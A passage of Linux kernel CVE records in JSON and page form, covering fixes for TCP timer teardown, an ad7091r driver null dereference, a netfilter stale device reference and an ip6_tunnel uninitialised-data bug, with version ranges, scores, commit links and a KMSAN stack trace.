"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: properly terminate timers for kernel sockets\n\nWe had various syzbot reports about tcp timers firing after\nthe corresponding netns has been dismantled.\n\nFortunately Josef Bacik could trigger the issue more often,\nand could test a patch I wrote two years ago.\n\nWhen TCP sockets are closed, we call inet_csk_clear_xmit_timers()\nto \u0027stop\u0027 the timers.\n\ninet_csk_clear_xmit_timers() can be called from any context,\nincluding when socket lock is held.\nThis is the reason it uses sk_stop_timer(), aka del_timer().\nThis means that ongoing timers might finish much later.\n\nFor user sockets, this is fine because each running timer\nholds a reference on the socket, and the user socket holds\na reference on the netns.\n\nFor kernel sockets, we risk that the netns is freed before\ntimer can complete, because kernel sockets do not hold\nreference on the netns.\n\nThis patch adds inet_csk_clear_xmit_timers_sync() function\nthat using sk_stop_timer_sync() to make sure all timers\nare terminated before the kernel socket is released.\nModules using kernel sockets close them in their netns exit()\nhandler.\n\nAlso add sock_not_owned_by_me() helper to get LOCKDEP\nsupport : inet_csk_clear_xmit_timers_sync() must not be called\nwhile socket lock is held.\n\nIt is very possible we can revert in the future commit\n3a58f13a881e (\"net: rds: acquire refcount on TCP sockets\")\nwhich attempted to solve the issue in rds only.\n(net/smc/af_smc.c and net/mptcp/subflow.c have similar code)\n\nWe probably can remove the check_net() tests from\ntcp_out_of_resources() and __tcp_close() in the future."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:08:11.069Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/93f0133b9d589cc6e865f254ad9be3e9d8133f50"
},
{
"url": "https://git.kernel.org/stable/c/44e62f5d35678686734afd47c6a421ad30772e7f"
},
{
"url": "https://git.kernel.org/stable/c/e3e27d2b446deb1f643758a0c4731f5c22492810"
},
{
"url": "https://git.kernel.org/stable/c/2e43d8eba6edd1cf05a3a20fdd77688fa7ec16a4"
},
{
"url": "https://git.kernel.org/stable/c/91b243de910a9ac8476d40238ab3dbfeedd5b7de"
},
{
"url": "https://git.kernel.org/stable/c/c1ae4d1e76eacddaacb958b67cd942082f800c87"
},
{
"url": "https://git.kernel.org/stable/c/899265c1389fe022802aae73dbf13ee08837a35a"
},
{
"url": "https://git.kernel.org/stable/c/151c9c724d05d5b0dd8acd3e11cb69ef1f2dbada"
}
],
"title": "tcp: properly terminate timers for kernel sockets",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35910",
"datePublished": "2024-05-19T08:35:03.287Z",
"dateReserved": "2024-05-17T13:50:33.121Z",
"dateUpdated": "2025-05-04T09:08:11.069Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52627 (GCVE-0-2023-52627)
Vulnerability from cvelistv5
Published
2024-03-26 17:49
Modified
2025-05-04 07:40
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iio: adc: ad7091r: Allow users to configure device events
AD7091R-5 devices are supported by the ad7091r-5 driver together with
the ad7091r-base driver. Those drivers declared iio events for notifying
user space when ADC readings fall bellow the thresholds of low limit
registers or above the values set in high limit registers.
However, to configure iio events and their thresholds, a set of callback
functions must be implemented and those were not present until now.
The consequence of trying to configure ad7091r-5 events without the
proper callback functions was a null pointer dereference in the kernel
because the pointers to the callback functions were not set.
Implement event configuration callbacks allowing users to read/write
event thresholds and enable/disable event generation.
Since the event spec structs are generic to AD7091R devices, also move
those from the ad7091r-5 driver the base driver so they can be reused
when support for ad7091r-2/-4/-8 be added.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ca69300173b642ba64118200172171ea5967b6c5 Version: ca69300173b642ba64118200172171ea5967b6c5 Version: ca69300173b642ba64118200172171ea5967b6c5 Version: ca69300173b642ba64118200172171ea5967b6c5 Version: ca69300173b642ba64118200172171ea5967b6c5 Version: ca69300173b642ba64118200172171ea5967b6c5 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52627",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-26T19:53:38.906343Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T16:22:26.258Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.265Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1eba6f7ffa295a0eec098c107043074be7cc4ec5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/49f322ce1f265935f15e5512da69a399f27a5091"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/137568aa540a9f587c48ff7d4c51cdba08cfe9a4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/89c4e63324e208a23098f7fb15c00487cecbfed2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/55aca2ce91a63740278502066beaddbd841af9c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/020e71c7ffc25dfe29ed9be6c2d39af7bd7f661f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iio/adc/ad7091r-base.c",
"drivers/iio/adc/ad7091r-base.h",
"drivers/iio/adc/ad7091r5.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1eba6f7ffa295a0eec098c107043074be7cc4ec5",
"status": "affected",
"version": "ca69300173b642ba64118200172171ea5967b6c5",
"versionType": "git"
},
{
"lessThan": "49f322ce1f265935f15e5512da69a399f27a5091",
"status": "affected",
"version": "ca69300173b642ba64118200172171ea5967b6c5",
"versionType": "git"
},
{
"lessThan": "137568aa540a9f587c48ff7d4c51cdba08cfe9a4",
"status": "affected",
"version": "ca69300173b642ba64118200172171ea5967b6c5",
"versionType": "git"
},
{
"lessThan": "89c4e63324e208a23098f7fb15c00487cecbfed2",
"status": "affected",
"version": "ca69300173b642ba64118200172171ea5967b6c5",
"versionType": "git"
},
{
"lessThan": "55aca2ce91a63740278502066beaddbd841af9c6",
"status": "affected",
"version": "ca69300173b642ba64118200172171ea5967b6c5",
"versionType": "git"
},
{
"lessThan": "020e71c7ffc25dfe29ed9be6c2d39af7bd7f661f",
"status": "affected",
"version": "ca69300173b642ba64118200172171ea5967b6c5",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iio/adc/ad7091r-base.c",
"drivers/iio/adc/ad7091r-base.h",
"drivers/iio/adc/ad7091r5.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adc: ad7091r: Allow users to configure device events\n\nAD7091R-5 devices are supported by the ad7091r-5 driver together with\nthe ad7091r-base driver. Those drivers declared iio events for notifying\nuser space when ADC readings fall bellow the thresholds of low limit\nregisters or above the values set in high limit registers.\nHowever, to configure iio events and their thresholds, a set of callback\nfunctions must be implemented and those were not present until now.\nThe consequence of trying to configure ad7091r-5 events without the\nproper callback functions was a null pointer dereference in the kernel\nbecause the pointers to the callback functions were not set.\n\nImplement event configuration callbacks allowing users to read/write\nevent thresholds and enable/disable event generation.\n\nSince the event spec structs are generic to AD7091R devices, also move\nthose from the ad7091r-5 driver the base driver so they can be reused\nwhen support for ad7091r-2/-4/-8 be added."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:40:16.719Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1eba6f7ffa295a0eec098c107043074be7cc4ec5"
},
{
"url": "https://git.kernel.org/stable/c/49f322ce1f265935f15e5512da69a399f27a5091"
},
{
"url": "https://git.kernel.org/stable/c/137568aa540a9f587c48ff7d4c51cdba08cfe9a4"
},
{
"url": "https://git.kernel.org/stable/c/89c4e63324e208a23098f7fb15c00487cecbfed2"
},
{
"url": "https://git.kernel.org/stable/c/55aca2ce91a63740278502066beaddbd841af9c6"
},
{
"url": "https://git.kernel.org/stable/c/020e71c7ffc25dfe29ed9be6c2d39af7bd7f661f"
}
],
"title": "iio: adc: ad7091r: Allow users to configure device events",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52627",
"datePublished": "2024-03-26T17:49:59.834Z",
"dateReserved": "2024-03-06T09:52:12.091Z",
"dateUpdated": "2025-05-04T07:40:16.719Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26808 (GCVE-0-2024-26808)
Vulnerability from cvelistv5
Published
2024-04-04 09:50
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_chain_filter: handle NETDEV_UNREGISTER for inet/ingress basechain
Remove netdevice from inet/ingress basechain in case NETDEV_UNREGISTER
event is reported, otherwise a stale reference to netdevice remains in
the hook list.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 60a3815da702fd9e4759945f26cce5c47d3967ad Version: 60a3815da702fd9e4759945f26cce5c47d3967ad Version: 60a3815da702fd9e4759945f26cce5c47d3967ad Version: 60a3815da702fd9e4759945f26cce5c47d3967ad Version: 60a3815da702fd9e4759945f26cce5c47d3967ad Version: 60a3815da702fd9e4759945f26cce5c47d3967ad |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.575Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9489e214ea8f2a90345516016aa51f2db3a8cc2f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70f17b48c86622217a58d5099d29242fc9adac58"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af149a46890e8285d1618bd68b8d159bdb87fdb3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e5888acbf1a3d8d021990ce6c6061fd5b2bb21b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/36a0a80f32209238469deb481967d777a3d539ee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/01acb2e8666a6529697141a6017edbf206921913"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26808",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-27T19:35:33.665875Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-27T19:36:03.888Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_chain_filter.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9489e214ea8f2a90345516016aa51f2db3a8cc2f",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
"versionType": "git"
},
{
"lessThan": "70f17b48c86622217a58d5099d29242fc9adac58",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
"versionType": "git"
},
{
"lessThan": "af149a46890e8285d1618bd68b8d159bdb87fdb3",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
"versionType": "git"
},
{
"lessThan": "e5888acbf1a3d8d021990ce6c6061fd5b2bb21b4",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
"versionType": "git"
},
{
"lessThan": "36a0a80f32209238469deb481967d777a3d539ee",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
"versionType": "git"
},
{
"lessThan": "01acb2e8666a6529697141a6017edbf206921913",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_chain_filter.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_chain_filter: handle NETDEV_UNREGISTER for inet/ingress basechain\n\nRemove netdevice from inet/ingress basechain in case NETDEV_UNREGISTER\nevent is reported, otherwise a stale reference to netdevice remains in\nthe hook list."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:02.292Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9489e214ea8f2a90345516016aa51f2db3a8cc2f"
},
{
"url": "https://git.kernel.org/stable/c/70f17b48c86622217a58d5099d29242fc9adac58"
},
{
"url": "https://git.kernel.org/stable/c/af149a46890e8285d1618bd68b8d159bdb87fdb3"
},
{
"url": "https://git.kernel.org/stable/c/e5888acbf1a3d8d021990ce6c6061fd5b2bb21b4"
},
{
"url": "https://git.kernel.org/stable/c/36a0a80f32209238469deb481967d777a3d539ee"
},
{
"url": "https://git.kernel.org/stable/c/01acb2e8666a6529697141a6017edbf206921913"
}
],
"title": "netfilter: nft_chain_filter: handle NETDEV_UNREGISTER for inet/ingress basechain",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26808",
"datePublished": "2024-04-04T09:50:26.672Z",
"dateReserved": "2024-02-19T14:20:24.179Z",
"dateUpdated": "2025-05-04T08:57:02.292Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26641 (GCVE-0-2024-26641)
Vulnerability from cvelistv5
Published
2024-03-18 10:19
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()
syzbot found __ip6_tnl_rcv() could access unitiliazed data [1].
Call pskb_inet_may_pull() to fix this, and initialize ipv6h
variable after this call as it can change skb->head.
[1]
BUG: KMSAN: uninit-value in __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]
BUG: KMSAN: uninit-value in INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]
BUG: KMSAN: uninit-value in IP6_ECN_decapsulate+0x7df/0x1e50 include/net/inet_ecn.h:321
__INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]
INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]
IP6_ECN_decapsulate+0x7df/0x1e50 include/net/inet_ecn.h:321
ip6ip6_dscp_ecn_decapsulate+0x178/0x1b0 net/ipv6/ip6_tunnel.c:727
__ip6_tnl_rcv+0xd4e/0x1590 net/ipv6/ip6_tunnel.c:845
ip6_tnl_rcv+0xce/0x100 net/ipv6/ip6_tunnel.c:888
gre_rcv+0x143f/0x1870
ip6_protocol_deliver_rcu+0xda6/0x2a60 net/ipv6/ip6_input.c:438
ip6_input_finish net/ipv6/ip6_input.c:483 [inline]
NF_HOOK include/linux/netfilter.h:314 [inline]
ip6_input+0x15d/0x430 net/ipv6/ip6_input.c:492
ip6_mc_input+0xa7e/0xc80 net/ipv6/ip6_input.c:586
dst_input include/net/dst.h:461 [inline]
ip6_rcv_finish+0x5db/0x870 net/ipv6/ip6_input.c:79
NF_HOOK include/linux/netfilter.h:314 [inline]
ipv6_rcv+0xda/0x390 net/ipv6/ip6_input.c:310
__netif_receive_skb_one_core net/core/dev.c:5532 [inline]
__netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5646
netif_receive_skb_internal net/core/dev.c:5732 [inline]
netif_receive_skb+0x58/0x660 net/core/dev.c:5791
tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1555
tun_get_user+0x53af/0x66d0 drivers/net/tun.c:2002
tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048
call_write_iter include/linux/fs.h:2084 [inline]
new_sync_write fs/read_write.c:497 [inline]
vfs_write+0x786/0x1200 fs/read_write.c:590
ksys_write+0x20f/0x4c0 fs/read_write.c:643
__do_sys_write fs/read_write.c:655 [inline]
__se_sys_write fs/read_write.c:652 [inline]
__x64_sys_write+0x93/0xd0 fs/read_write.c:652
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Uninit was created at:
slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768
slab_alloc_node mm/slub.c:3478 [inline]
kmem_cache_alloc_node+0x5e9/0xb10 mm/slub.c:3523
kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560
__alloc_skb+0x318/0x740 net/core/skbuff.c:651
alloc_skb include/linux/skbuff.h:1286 [inline]
alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6334
sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2787
tun_alloc_skb drivers/net/tun.c:1531 [inline]
tun_get_user+0x1e8a/0x66d0 drivers/net/tun.c:1846
tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048
call_write_iter include/linux/fs.h:2084 [inline]
new_sync_write fs/read_write.c:497 [inline]
vfs_write+0x786/0x1200 fs/read_write.c:590
ksys_write+0x20f/0x4c0 fs/read_write.c:643
__do_sys_write fs/read_write.c:655 [inline]
__se_sys_write fs/read_write.c:652 [inline]
__x64_sys_write+0x93/0xd0 fs/read_write.c:652
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
CPU: 0 PID: 5034 Comm: syz-executor331 Not tainted 6.7.0-syzkaller-00562-g9f8413c4a66f #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0d3c703a9d1723c7707e0680019ac8ff5922db42 Version: 0d3c703a9d1723c7707e0680019ac8ff5922db42 Version: 0d3c703a9d1723c7707e0680019ac8ff5922db42 Version: 0d3c703a9d1723c7707e0680019ac8ff5922db42 Version: 0d3c703a9d1723c7707e0680019ac8ff5922db42 Version: 0d3c703a9d1723c7707e0680019ac8ff5922db42 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26641",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T16:08:53.324454Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T16:09:02.235Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-11-08T15:02:48.742Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a9bc32879a08f23cdb80a48c738017e39aea1080"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af6b5c50d47ab43e5272ad61935d0ed2e264d3f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d54e4da98bbfa8c257bdca94c49652d81d18a4d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/350a6640fac4b53564ec20aa3f4a0922cb0ba5e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c835df3bcc14858ae9b27315dd7de76370b94f3a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d975c15c0cd744000ca386247432d57b21f9df0"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20241108-0008/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/ip6_tunnel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
